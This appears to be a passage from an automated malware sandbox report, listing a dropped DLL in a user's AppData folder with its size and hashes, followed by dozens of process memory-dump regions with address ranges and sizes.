                              • C:\Users\Admin\AppData\Roaming\nsis_unse579923.dll

                                Filesize

                                58KB

                                MD5

                                664e46926466a2d4c9b87540f4853c39

                                SHA1

                                b172d1c2bde331770b0a944fcf6a9e2d75ded66b

                                SHA256

                                92a7c3296a561fb39798f821173e69d1feff44ff3a84caa4c6bb890945e79488

                                SHA512

                                1490ee65220c71a9f445df4b0f34d0c7bd3ece2e58253cfa3194d34e813843e0f71ea7bce0f0ae562a620334fdf3589262ca2f3209414936aa28a365db64ff03

                              • memory/1088-252-0x0000000140000000-0x00000001400C6000-memory.dmp

                                Filesize

                                792KB

                              • memory/1088-251-0x0000000140000000-0x00000001400C6000-memory.dmp

                                Filesize

                                792KB

                              • memory/1088-258-0x0000000140000000-0x00000001400C6000-memory.dmp

                                Filesize

                                792KB

                              • memory/1088-249-0x0000000140000000-0x00000001400C6000-memory.dmp

                                Filesize

                                792KB

                              • memory/1088-254-0x0000000140000000-0x00000001400C6000-memory.dmp

                                Filesize

                                792KB

                              • memory/1288-257-0x00007FF4B7CD0000-0x00007FF4B7DCA000-memory.dmp

                                Filesize

                                1000KB

                              • memory/1288-245-0x00007FF4B7CD0000-0x00007FF4B7DCA000-memory.dmp

                                Filesize

                                1000KB

                              • memory/1288-256-0x0000000010000000-0x0000000010013000-memory.dmp

                                Filesize

                                76KB

                              • memory/1288-244-0x000001DE50CA0000-0x000001DE50CA7000-memory.dmp

                                Filesize

                                28KB

                              • memory/1416-142-0x0000000000CE0000-0x0000000000DCC000-memory.dmp

                                Filesize

                                944KB

                              • memory/1452-179-0x0000000000750000-0x0000000000759000-memory.dmp

                                Filesize

                                36KB

                              • memory/1452-168-0x0000000000760000-0x0000000000765000-memory.dmp

                                Filesize

                                20KB

                              • memory/1452-233-0x0000000000760000-0x0000000000765000-memory.dmp

                                Filesize

                                20KB

                              • memory/1524-189-0x0000000001180000-0x0000000001189000-memory.dmp

                                Filesize

                                36KB

                              • memory/1524-236-0x0000000001190000-0x0000000001195000-memory.dmp

                                Filesize

                                20KB

                              • memory/1932-218-0x0000000006AD0000-0x0000000006B03000-memory.dmp

                                Filesize

                                204KB

                              • memory/1932-217-0x00000000065A0000-0x00000000065E0000-memory.dmp

                                Filesize

                                256KB

                              • memory/1932-228-0x0000000006701000-0x0000000006703000-memory.dmp

                                Filesize

                                8KB

                              • memory/1932-241-0x00000000066D0000-0x00000000067D0000-memory.dmp

                                Filesize

                                1024KB

                              • memory/1932-201-0x0000000006610000-0x00000000066CC000-memory.dmp

                                Filesize

                                752KB

                              • memory/1932-242-0x0000000006B50000-0x0000000006B6D000-memory.dmp

                                Filesize

                                116KB

                              • memory/1932-246-0x0000000006AD0000-0x0000000006B03000-memory.dmp

                                Filesize

                                204KB

                              • memory/2228-232-0x00007FFCEE9C0000-0x00007FFCEF481000-memory.dmp

                                Filesize

                                10.8MB

                              • memory/2228-259-0x00007FFCEE9C0000-0x00007FFCEF481000-memory.dmp

                                Filesize

                                10.8MB

                              • memory/2228-255-0x00007FFCEE9C0000-0x00007FFCEF481000-memory.dmp

                                Filesize

                                10.8MB

                              • memory/2760-223-0x0000000000450000-0x0000000000458000-memory.dmp

                                Filesize

                                32KB

                              • memory/2760-219-0x0000000000440000-0x000000000044B000-memory.dmp

                                Filesize

                                44KB

                              • memory/2760-248-0x0000000000450000-0x0000000000458000-memory.dmp

                                Filesize

                                32KB

                              • memory/3404-231-0x0000000000D40000-0x0000000000D49000-memory.dmp

                                Filesize

                                36KB

                              • memory/3404-161-0x0000000000D30000-0x0000000000D3F000-memory.dmp

                                Filesize

                                60KB

                              • memory/3404-160-0x0000000000D40000-0x0000000000D49000-memory.dmp

                                Filesize

                                36KB

                              • memory/3612-196-0x00007FFCEE9C0000-0x00007FFCEF481000-memory.dmp

                                Filesize

                                10.8MB

                              • memory/3612-240-0x00007FFCEE9C0000-0x00007FFCEF481000-memory.dmp

                                Filesize

                                10.8MB

                              • memory/3612-191-0x000001F3EC7B0000-0x000001F3EC7D2000-memory.dmp

                                Filesize

                                136KB

                              • memory/4052-200-0x0000000000B60000-0x0000000000C44000-memory.dmp

                                Filesize

                                912KB

                              • memory/4052-212-0x00007FFCEE9C0000-0x00007FFCEF481000-memory.dmp

                                Filesize

                                10.8MB

                              • memory/4052-220-0x00007FFCEE9C0000-0x00007FFCEF481000-memory.dmp

                                Filesize

                                10.8MB

                              • memory/4428-183-0x00000000005D0000-0x00000000005D6000-memory.dmp

                                Filesize

                                24KB

                              • memory/4428-184-0x00000000005C0000-0x00000000005CC000-memory.dmp

                                Filesize

                                48KB

                              • memory/4428-234-0x00000000005D0000-0x00000000005D6000-memory.dmp

                                Filesize

                                24KB

                              • memory/4456-197-0x00000000004A0000-0x00000000004A6000-memory.dmp

                                Filesize

                                24KB

                              • memory/4456-198-0x0000000000490000-0x000000000049B000-memory.dmp

                                Filesize

                                44KB

                              • memory/4456-243-0x00000000004A0000-0x00000000004A6000-memory.dmp

                                Filesize

                                24KB

                              • memory/4492-247-0x0000000000770000-0x0000000000777000-memory.dmp

                                Filesize

                                28KB

                              • memory/4492-214-0x0000000000770000-0x0000000000777000-memory.dmp

                                Filesize

                                28KB

                              • memory/4492-216-0x0000000000760000-0x000000000076D000-memory.dmp

                                Filesize

                                52KB

                              • memory/4680-157-0x0000000000490000-0x000000000049B000-memory.dmp

                                Filesize

                                44KB

                              • memory/4680-156-0x00000000004A0000-0x00000000004A7000-memory.dmp

                                Filesize

                                28KB

                              • memory/4680-225-0x00000000004A0000-0x00000000004A7000-memory.dmp

                                Filesize

                                28KB

                              • memory/5028-135-0x000000000054D000-0x0000000000562000-memory.dmp

                                Filesize

                                84KB

                              • memory/5028-138-0x0000000000400000-0x0000000000455000-memory.dmp

                                Filesize

                                340KB

                              • memory/5028-137-0x0000000000400000-0x0000000000455000-memory.dmp

                                Filesize

                                340KB

                              • memory/5028-136-0x0000000002050000-0x0000000002059000-memory.dmp

                                Filesize

                                36KB

                              • memory/5112-186-0x0000000000930000-0x0000000000952000-memory.dmp

                                Filesize

                                136KB

                              • memory/5112-187-0x0000000000900000-0x0000000000927000-memory.dmp

                                Filesize

                                156KB

                              • memory/5112-235-0x0000000000930000-0x0000000000952000-memory.dmp

                                Filesize

                                136KB